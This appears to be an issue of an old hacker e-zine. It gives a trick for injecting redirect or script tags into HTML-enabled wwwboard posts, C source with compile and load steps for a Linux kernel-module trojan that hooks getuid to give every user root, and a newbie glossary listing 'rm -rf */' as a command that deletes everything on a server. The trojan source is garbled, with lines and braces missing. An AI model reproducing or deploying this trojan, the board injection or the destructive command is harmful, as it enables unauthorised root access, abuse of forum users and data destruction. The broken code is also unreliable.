It is a buffer overflow done in javascript. I found it on a webpage
somewhere and i do not remember where so i am very sorry to the person
that wrote it that i cannot list your name here cause i found this a
while ago. Sometimes this kicker doesn't work. But we know that his
board supports HTML so you can input this script that will redirect the
person to another page containing the script.
Input this into the message area:
The kicker is located at the page so when the user wants to read your
post, it will redirect them to that page wich contains that JavaScript
code. I would reccomend just putting that refresh tag instead of the
JavaScript tag cause the Matt Wright wwwboard comes with JavaScript
turned off or as the defualt. So the refresh would work better and would
have more of a chance of it to work.
This doesn't just work with Matt Wright's wwwboards, but really any
wwwboards that support HTML. It is just that i tested and figured out
how this worked on a Matt Wright wwwboard.
This is also a good trick if you have a sponser that pays by the click,
just redirect them to your sponser....
Lord Oak
2.03 --=\\all-root.c.txt\\=--
* A kernel trojan (basic linux kernel module)
* Description: gives all users root
* coded by fred_ | blasphemy
* Compile: gcc -c -O3 all-root.c
* Load: insmod all-root.o
* Unload: rmmod all-root
* email:
#define MODULE
#define __KERNEL__
extern void *sys_call_table[];
int (*orig_getuid)();
int give_root()
int x;
if (current->uid != 0) {
current->uid = 0;
current->gid = 0;
current->euid = 0;
current->egid = 0;
return 0;
int init_module(void)
orig_getuid = sys_call_table[SYS_getuid];
sys_call_table[SYS_getuid] = give_root;
return 0;
void cleanup_module(void)
sys_call_table[SYS_getuid] = orig_getuid;
3.01 --=\\Neophyte Vocab\\=--
Here is a list of vocab that I made up for the newbies. You should probably learn this
if you are taking into consideration of being a 'computer h4x0r'. This is probably
where you should start and the first thing you should learn before anything else. I put
them in alphabetical order (finally learned how to do that!)
*Words & Descriptions:
31337 - see elite.
box - basically the OS or your computer.
buffer overflow - tries to 'overflow' some part of a server (see exploit & server).
dns - domain name server. Changes to (brief description).
dos - denial of service; something to slow a computer down (see nuke & ping).
computer - a television set with buttons and a rodent attached to it.
elite - the best at something who can make no mistakes at that something.
exploit - a security hole (in a server, web browser, anything).
ftp - file transfer protocol. Used to transer files (upload and/or download).
ftpd - ftp daemon (see ftp server & ftp).
ftp server - a server used to allows people to ftp to it (see ftp).
http - hypertext tranfser protocol. Allows you to view the persons webpage.
httpd - http daemon (see http & http server).
http server - a server that allows people to surf/view your site.
lamer - someone that tries to understand hacking and doesn't.
linux - an operating system that is like a "sub-operating system" of unix (see unix).
local exploit - an exploit that only works on or "local host" (see exploit).
nuke - sends large packets to a computer causing a dos (see dos).
passwd - where all of the usernames and passwords are stored on a unix box (see unix).
passwd cracker - program used for cracking passwd files (see passwd & wordlist).
ping - sends 'x' number of packets to a computer and sees how fast they get there.
port scanner - program used for scanning various ports on a computer (see computer).
remote exploit - an exploit that can be used on any IP (see exploit).
rm -rf */ - unix command to delete everything on the server (see unix).
root - the username to a unix box. The person that has super user privlages.
script kiddie - someone that uses other peoples exploits or that weren't made by them.
server - where you go when you type in a site URL and upload to a site (basic descrip.)
shell account - a user account on a unix box (see unix).
unix - the operating system that MOST servers are run on (see server).
warez - giving away or re-selling already used copyrighted material.
windowsNT - another operating system that a lot of servers run on (see server).
wordlist - file w/ generated words, for cracking passwd files (see passwd cracking).
*Sayings & Descriptions:
I like your computer - means he likes your rodent/rat.
I got root - means someone gained root on a server.
I got a shell account - means someone got a user account on a unix server/computer.
I used the IMAPD exploit - means that he used the IMAPD security glitch to gain access.
Ok I hope your starting to understand the 'sayings' and how to understand the vocab
when they are put into sentances.
*Programs & misc:
passwd cracking - John the Ripper, pass crack
port scanner - 7th Sphere port scanner, Hackers Utility
wordlist generators - Dictionary Generator v1.0 (dic-gen), passlist
shell accounts -,,
All of these programs can be found on my site (, and a lot more of
them. These are just some of the programs that I use when I am in windows and to lazy
to reboot into RH5.2 (RedHat 5.2).
Lord Oak
. Quote #3- .
. .
. "I needed the DOS prog so I could impress my NY Times slut..." .
. -JayPee .
. .
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_| Antidote is an HNN Affiliate _|
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*ALL* ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.